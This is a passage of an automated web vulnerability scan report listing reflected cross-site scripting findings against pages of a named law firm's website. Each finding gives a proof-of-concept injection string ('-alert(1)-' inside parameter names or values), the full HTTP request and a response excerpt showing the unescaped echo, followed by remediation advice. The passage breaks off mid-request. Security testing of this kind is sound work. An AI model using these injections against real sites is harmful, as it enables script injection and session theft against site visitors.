Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:41:56 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10881


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1';//]]>
...[SNIP]...

4.86. http://www.cov.com/news/detail.aspx [news parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /news/detail.aspx

Issue detail

The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:40:51 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1158; path=/
Set-Cookie: PortletId=1149501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10909


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP</title>
<meta name="language" content="7483b893-
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/news/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91';//]]>
...[SNIP]...

4.87. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /newsandevents

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:54 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1157; path=/
Set-Cookie: PortletId=1148501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 144156


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | News & Events</title>
<meta name="language" co
...[SNIP]...
ent.aspnetForm.action = '/newsandevents/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/newsandevents/NewsEventsPubs.aspx?f75a8'-alert(1)-'99f649b592f=1';//]]>
...[SNIP]...

4.88. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /offices

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:49 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1161; path=/
Set-Cookie: PortletId=1152501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78699


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Offices</title>
<meta name="language" content=
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/offices/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/offices/List.aspx?2c98b'-alert(1)-'fd3b25fecf2=1';//]]>
...[SNIP]...

4.89. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:36:08 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?f4da1'-alert(1)-'610b8b730dc=1';//]]>
...[SNIP]...

4.90. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /practice/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /practice/?c53e5'-alert(1)-'9529b8f7a51=1 HTTP/1.1
Host: www.cov.com
Proxy-Connection: keep-alive
Referer: http://www.cov.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 16:56:09 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1142; path=/
Set-Cookie: PortletId=1133501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 247989
Content-Length: 247989


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Practices, Industries & Regions</title>
<meta
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/practice/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/practice/Services.aspx?c53e5'-alert(1)-'9529b8f7a51=1';//]]>
...[SNIP]...

4.91. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /privacypolicy

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:27 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1164; path=/
Set-Cookie: PortletId=1155501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13182


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Privacy Policy</title>
<meta name="language" c
...[SNIP]...
nt.aspnetForm.action = '/privacypolicy/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/privacypolicy/GeneralPageData.aspx?df5e0'-alert(1)-'cd34e2cebf=1';//]]>
...[SNIP]...

4.92. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /probonooverview

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1148; path=/
Set-Cookie: PortletId=1139501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Pro Bono | Overview</title>
<meta name="langua
...[SNIP]...
cument.aspnetForm.action = '/probonooverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/probonooverview/ProBono.aspx?eb241'-alert(1)-'14889ea6214=1';//]]>
...[SNIP]...

4.93. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1159; path=/
Set-Cookie: PortletId=1150501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Publications</title>
<meta name="language" con
...[SNIP]...
DATA[
document.aspnetForm.action = '/publications/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/publications/List.aspx?37aa1'-alert(1)-'7b6396f21de=1';//]]>
...[SNIP]...

4.94. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /recruitingthebestandbrightest

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
